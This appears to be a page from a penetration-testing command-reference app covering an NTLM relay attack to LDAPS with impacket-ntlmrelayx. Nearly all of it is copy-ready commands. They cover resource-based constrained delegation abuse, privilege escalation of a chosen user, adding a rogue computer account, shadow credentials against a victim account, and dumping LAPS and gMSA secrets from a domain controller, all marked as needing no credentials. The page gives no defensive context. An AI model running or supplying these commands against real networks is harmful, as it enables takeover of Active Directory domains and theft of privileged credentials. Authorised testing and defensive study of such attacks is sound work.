ntlmrelayx → LDAPS (Add Computer / RBCD / Shadow Creds)

Relay coerced authentication to LDAPS — required when MIC and channel binding force LDAP signing. Common payloads: --add-computer (then RBCD), --delegate-access (set msDS-AllowedToActOnBehalfOfOtherIdentity), --shadow-credentials.

Tool
impacket-ntlmrelayx
Category
Credential Attacks / NTLM Relay & Coercion
Platform
linux
Requires
no credentials
Protocols
LDAP, NTLM

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-ntlmrelayx -t ldaps://<dc-ip> --delegate-access --escalate-user '<attacker>' --no-smb-server

Credential variants

The same attack using a different authentication material.

Add Computer requires no credentials

impacket-ntlmrelayx -t ldaps://<dc-ip> --add-computer ATTACKERPC --no-smb-server

Shadow Credentials requires no credentials

impacket-ntlmrelayx -t ldaps://<dc-ip> --shadow-credentials --shadow-target '<victim>' --no-smb-server

Dump Domain requires no credentials

impacket-ntlmrelayx -t ldaps://<dc-ip> --dump-laps --dump-gmsa --no-smb-server

Examples

impacket-ntlmrelayx -t ldaps://10.10.10.10 --delegate-access --escalate-user jdoe --no-smb-server

Tags

impacket ntlmrelayx relay ldaps rbcd shadow-credentials

References